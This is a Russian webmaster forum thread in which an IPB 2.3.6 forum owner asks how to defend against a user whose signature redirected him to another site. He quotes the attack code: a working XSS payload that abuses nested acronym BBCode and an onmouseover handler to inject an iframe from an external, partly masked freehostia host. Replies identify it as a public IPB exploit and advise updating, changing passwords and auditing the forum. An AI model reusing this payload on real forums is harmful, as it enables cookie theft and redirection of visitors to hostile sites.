- Поисковые системы
- Практика оптимизации
- Трафик для сайтов
- Монетизация сайтов
- Сайтостроение
- Социальный Маркетинг
- Общение профессионалов
- Биржа и продажа
- Финансовые объявления
- Работа на постоянной основе
- Сайты - покупка, продажа
- Соцсети: страницы, группы, приложения
- Сайты без доменов
- Трафик, тизерная и баннерная реклама
- Продажа, оценка, регистрация доменов
- Ссылки - обмен, покупка, продажа
- Программы и скрипты
- Размещение статей
- Инфопродукты
- Прочие цифровые товары
- Работа и услуги для вебмастера
- Оптимизация, продвижение и аудит
- Ведение рекламных кампаний
- Услуги в области SMM
- Программирование
- Администрирование серверов и сайтов
- Прокси, ВПН, анонимайзеры, IP
- Платное обучение, вебинары
- Регистрация в каталогах
- Копирайтинг, переводы
- Дизайн
- Usability: консультации и аудит
- Изготовление сайтов
- Наполнение сайтов
- Прочие услуги
- Не про работу
Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий
Есть форум ipb
один пользователь прислал в ЛС некое сообщение, при прокрутке скролом страницы перекинуло на другой сайт и вернуло обратно. В подписи юзера оказался следующий код
[acronym=test1[acronym=test2 onmouseover=document.write("\x3Ciframe\x20src=http://****.freehostia.com/\x20frameborder=0\x20width=1024\x20height=3186\x20scrolling=no\x3E\x3C/iframe\x3E");document.close(); ]_]___________________________________________________________________________[/acronym]_[/acronym]вот как работает тег акронима:
Как защититься и что делать?
ТС закажи у народа проверку твоего форума на уязвимости, с твоей стороны только оплатить и после выявление всех уязвимостей их устранить полностью. и тогда форуму мало кто будет страшен, тем более этот школьник.
Этот "школьник" если захочет уведет любой твой сайт. Вообще попрошу тех кто ничего не понимает в данном вопросе в данной ветке не высказываться
Этот "школьник" если захочет уведет любой твой сайт
гений приворота чтоли? :D
много он уже увел?
mower, как я понимаю ваш форум давно не обновлялся? Почитайте по сабжу: [Обзор уязвимостей IPB]
#Pomeo# всё верно сказал, найди того, кто протестирует сайт на уязвимости. Акронимный эксплоит для ипб валяется в паблике, следовательно твой гипер-хакер - школьник.
Ипб последняя версия стоит?
ипб 2 3 6
Netsp,
Т.е. уязвимость именно тега акроним? если я просто удалю этот тег разве нельзя сконструировать подобную конструкцию из других тегов?
mower добавил 07.03.2010 в 13:23
гений приворота чтоли? :D
много он уже увел?
Я примерно догадываюсь кто ломает. Могу сказать что это человек, который занимается хакингом и да ,на его счету очень много взломов. Более того, это не 1 человек, а команда. То что они делают сейчас - это может быть и полноценной попыткой взлома, а может быть и разминкой
То что они делают сейчас - это может быть и полноценной попыткой взлома, а может быть и разминкой
ну с помощью xss можно максимум куки украсть, но этого максимума иногда может быть достаточно)
bearman добавил 07.03.2010 в 13:27
если я просто удалю этот тег разве нельзя сконструировать подобную конструкцию из других тегов?
зависит от bb парсера
1. Могут украсть куки - я перешел к ним на сайт ***.фрихостиа, какие именно куки они могут украсть: куки от сайта фрихостиа, куки от моего сайта, куки других сайтов (почта, короче все что там записано в браузере)
2. Я побывал на их сайте - значит могли и трояна закинуть
1. куки вашего сайта
2. проверьтесь на вич)
1. Могут украсть куки - я перешел к ним на сайт ***.фрихостиа, какие именно куки они могут украсть: куки от сайта фрихостиа, куки от моего сайта, куки других сайтов (почта, короче все что там записано в браузере)
2. Я побывал на их сайте - значит могли и трояна закинуть
1. меняй пароли от админки, рута и фтп твоего форума.
2. могли, поэтому ставь антвиря(хотя и антивирь тут может н еспасти), ищи людей кто тя выручит с проверкой на уязвимости.